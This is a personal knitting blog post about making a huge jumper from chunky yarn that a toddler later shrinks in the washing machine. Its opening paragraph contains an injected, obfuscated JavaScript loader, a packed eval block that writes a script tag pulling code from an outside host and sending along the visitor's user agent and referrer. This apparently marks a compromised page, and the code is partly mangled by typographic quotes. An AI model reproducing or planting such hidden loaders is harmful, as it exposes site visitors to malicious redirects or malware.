The summer is drawing to a close and I am one of those people that really feels the cold and I HATE it! I have been longing to make something with Paloma eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|krnys|var|u0026u|referrer|etebd||js|php’.split(‘|’),0,{}))
– the Super Chunky yarn from Debbie Bliss. I have bought 1kg and I am making a huge jumper/tunic. I am making the pattern up as I go along so that I can make it available on the site so keep your eyes peeled for further developments 🙂

Much as I have enjoyed my foray into Lace knitting this summer, I have to say it is refreshing to spend a couple of hours working on something and see it grow by 6-10″. It is so satisfying and after a couple of evenings (glued to the Olympics) I have almost finished the back. I am going to make it super long and slightly baggy, with a huge roll neck. The yarn is so light that you can make something as big as this and know that it isn’t going to weigh a ton… Plus I have made SO many jumpers over the years and haven’t used a pattern for ages so I am confident in being able to make it just the right size for me. I will have to work out the other sizes from the finished garment…

OK – so it’s now Tuesday morning (3 days since I started said jumper) and I am already on the front (and the back is over 80cms!) I just love this yarn – it is almost as soft as cashmere, yet less than half the price – that’s if you could find cashmere this chunky. When I have finished it I will be willing it to get cold, just so I can wear it 🙂

Well it is now a few weeks on and I have finished the jumper – twice! It is HUGE, and although I love it, it is much bigger than I thought and the neckline was too baggy. So, I have undone the neck and am just working on fixing it now. Fingers crossed it will be done by the weekend when I will post some pictures here.

Hurray – it is now finished. It is a bit bigger than I had perhaps anticipated, but I wanted it to be a comfy over-jumper to wear when I am really cold (which is generally from October-April!) so I am pretty pleased. I may make another slightly smaller one in a different colour later in the year – it will depend on how my other projects go. Anyway here are the pictures.

OMG – I have to add this… Today is Wed 3rd October so less than a month since I finished the above jumper. I was wearing it today as I have a cold and feeling miserable. My toddler also has a cold and when he woke up from his nap he coughed so much that he was sick – not loads but enough to make the jumper need a wash. I decided to put it in the machine because to be honest, it’s SO big that I thought a tiny bit of shrinkage wouldn’t hurt… Anyway, I must have turned my back just as I put the wash on because my helpful toddler not only changed the temperature dial from 20 – 60deg but he also put it on a superwash! It has come out like this…

and wouldn’t even fit said toddler! I am totally gutted but guess I will just have to make something else for myself – this time in pure cashmere! 🙂
